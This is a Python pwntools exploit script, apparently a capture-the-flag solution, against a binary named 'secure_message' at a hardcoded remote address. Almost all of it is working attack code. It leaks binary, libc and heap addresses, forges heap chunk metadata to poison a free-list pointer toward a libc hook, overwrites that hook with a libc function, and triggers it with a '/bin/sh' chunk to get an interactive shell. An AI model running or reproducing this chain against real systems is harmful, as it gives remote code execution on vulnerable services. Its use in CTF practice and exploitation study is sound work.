  1. #!/usr/bin/env python
  2. from pwn import *
  3.  
# pwntools settings: gdb.debug()/gdb.attach() open their window via tmux.
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window

# libc = ELF('./libc-2.27.so')
# Target binary; pwntools' default architecture is taken from its ELF header.
elf = ELF('./secure_message')
context(os='linux', arch=elf.arch)

# Endpoints selected by the command-line option parsed below
# ('r' -> RHOST:RPORT, 'l' -> LHOST:LPORT).
RHOST = "178.128.87.12"
RPORT = 31337
LHOST = "127.0.0.1"
LPORT = 31337
  15.  
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of the ELF section called *name*.

    *elf* defaults to the module-level binary. Not called anywhere in the
    script as pasted.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
  18.  
def dbg(ss):
    """Log ``<name>: 0x<value>`` for the module-level variable named by *ss*.

    NOTE(review): ``eval`` resolves *ss* as an expression in this module's
    globals; every call site passes a plain variable name. Do not pass
    anything derived from external input here.
    """
    value = eval(ss)
    log.info("{}: {:#x}".format(ss, value))
  21.  
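conn = None
# Pop the mode option so the rest of argv is left for pwntools:
#   r = remote host, l = local listener, d = run under gdb with a script,
#   a = run locally then attach gdb, anything else / nothing = plain process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in ('r', 'l'):
    # Tuple membership, not substring membership: the original `opt in 'rl'`
    # also accepted '' and 'rl', which then raised KeyError on the dict lookup.
    endpoints = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*endpoints[opt])
elif opt == 'd':
    # NOTE(review): the original applied .format(hex(main or entrypoint)) to this
    # template, which contains no placeholder, so the call had no effect;
    # presumably a breakpoint line was dropped from the paste — TODO confirm.
    gdbscript = """

continue
"""
    conn = gdb.debug(['./secure_message'], gdbscript=gdbscript)
else:
    conn = process(['./secure_message'])
    # conn = process(['./secure_message'], env={'LD_PRELOAD': './libc-2.27.so'})
if opt == 'a':
    gdb.attach(conn)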
  36.  
def register(name, password, desc):
    """Walk the 'register' menu path: option 1, then answer the three prompts.

    Username/password/description are sent with ``send`` (no newline
    appended), so the caller supplies any trailing newline it wants.
    """
    conn.sendlineafter('Choice: ', '1')
    prompts = (
        ('Username:', name),
        ('Password:', password),
        ('Describe your self', desc),
    )
    for prompt, answer in prompts:
        conn.sendafter(prompt, answer)
def login(name, password):
    """Walk the 'login' menu path (option 2) and consume output up to 'Hello:'."""
    conn.sendlineafter('Choice: ', '2')
    for prompt, answer in (('Username:', name), ('Password:', password)):
        conn.sendafter(prompt, answer)
    conn.recvuntil('Hello:')
  47.  
def quit():
    """Send menu option 3 at the next 'Choice: ' prompt.

    Shadows the builtin ``quit``; kept under that name because the script
    defines it this way. Not called in the script as pasted.
    """
    choice = '3'
    conn.sendlineafter('Choice: ', choice)
  50.  
def add(name, size, content):
    """Menu option 1 (after login): create an entry, then send its content.

    Name and size are answered line-by-line at their prompts; the content is
    sent raw after a short pause, with no prompt wait and no newline added.
    """
    conn.sendlineafter('Choice: ', '1')
    for prompt, answer in (('Name: ', name), ('Size:', str(size))):
        conn.sendlineafter(prompt, answer)
    # Give the program a moment to read the size before the body arrives.
    time.sleep(0.1)
    conn.send(content)
  57.  
def edit(idx, size, content):
    """Menu option 3: rewrite entry *idx* with a new size, then send the content.

    Same send discipline as ``add``: prompts answered line-by-line, content
    sent raw after a short pause with no newline appended.
    """
    conn.sendlineafter('Choice: ', '3')
    for prompt, answer in (('edit?', str(idx)), ('Size:', str(size))):
        conn.sendlineafter(prompt, answer)
    # Give the program a moment to read the size before the body arrives.
    time.sleep(0.1)
    conn.send(content)
  64.  
def remove(idx):
    """Menu option 2: delete entry *idx* (index answered at the '?' prompt)."""
    steps = (('Choice: ', '2'), ('?', str(idx)))
    for prompt, answer in steps:
        conn.sendlineafter(prompt, answer)
  68.  
# exploit
# NOTE(review): Python 2 only — str.decode('hex') and the str/bytes mixing in
# the p64()/u64() concatenations below fail under Python 3 pwntools.
log.info('Pwning')
register('hoge\n', 'fuga\n','a'*0x80)
register('b'*0x20,'b'*0x20,'b'*0x80)
register('c'*0x20,'c'*0x20,'c'*0x80)
register('d'*0x20,'d'*0x20,'d'*0x80)
login('hoge\n', 'fuga\n')

add('x'*0x18, 0xfd0, 'z'*0xfd0)
conn.send(p64(0xc9f68e5b26a07627))
conn.send(p64(0xc9f68e5b26a07627))
conn.send(p64(0xc9f68e5b26a07627))
add('y'*0x18, 0xfd0, 'w'*0xfd0)
conn.send(p64(0xc9f68e5b26a07627+0x1000))
conn.send(p64(0xc9f68e5b26a07627+0x1000))
conn.send(p64(0xc9f68e5b26a07627+0x1000))
edit(0, -1, 'a'*0x1f00+'\n')

add('', 0xff, '\n')
conn.send(p64(0xc9f68e5b26a07627+0x3000))
conn.send(p64(0xc9f68e5b26a07627+0x3000))
conn.send(p64(0)*4)
#conn.send(p64(0xc9f68e5b26a07627+0x2000))

# Menu option 4 prints the entry listing; the three values below are parsed
# from what the program echoes back (6 raw bytes, then two 14-hex-char runs).
# The subtracted offsets (0x211d, 0x3ec2b0, 0x250) and the 0x3ed8e8 / 0x4f440
# constants further down are tied to the specific binary and libc build this
# script was written against; they are not valid for any other build.
conn.sendlineafter('Choice: ', '4')
conn.recvuntil('1 - [yyyyyyyyyyyyyyyyyyyyyyyy')
bin_base = u64(conn.recv(6)+'\x00\x00') - 0x211d
dbg('bin_base')
conn.recvuntil('\n')
libc_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x3ec2b0
dbg('libc_base')
conn.recv(14)
heap_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x250
dbg('heap_base')

add('aaaaaa', 0x1000, 'b'*0x1000)
conn.send(p64(0xdeadbeef000))
conn.send(p64(0xdeadbeef000))
conn.send(p64(0)*4)
add('target', 0x100, 'c'*0x1000)
conn.send(p64(0xdeadbef0000))
conn.send(p64(0xdeadbef0000))
conn.send(p64(0)*4)
edit(2, 8192, 'hoge\n')

payload = 'd'*0xfd0 + p32(0x100) + p32(1) + p64(0xe5b26a08030 + 0x10)
add('aaaaaa', 0x1100, payload+'\n')
conn.send(p64(0x00000deadbef0000-0x1000))
conn.send(p64(0x00000deadbef0000-0x1000))
conn.send(p64(0)*4)

payload = p64(0) + p64(0x31)
payload += p64(0) * 5
payload += p64(0x31)
edit(0, 0x100, payload+'\n')

remove(2)

payload = p64(0) + p64(0x31)
payload += p64(libc_base + 0x3ed8e8)+p64(0) * 4
payload += p64(0x31)
edit(0, 0x100, payload+'\n')

add('a', 0xf00, 'hoge\n')
conn.send(p64(0xbeefdead000))
conn.send(p64(0xbeefdead000))
conn.send(p64(0)*4)

add('a', 0xf00, '/bin/sh\x00\n')
conn.send(p64(0xbeefdead000))
conn.send(p64(0xbeefdead000))
conn.send(p64(libc_base+0x4f440))

# Hand the connection to the terminal for manual interaction.
conn.interactive()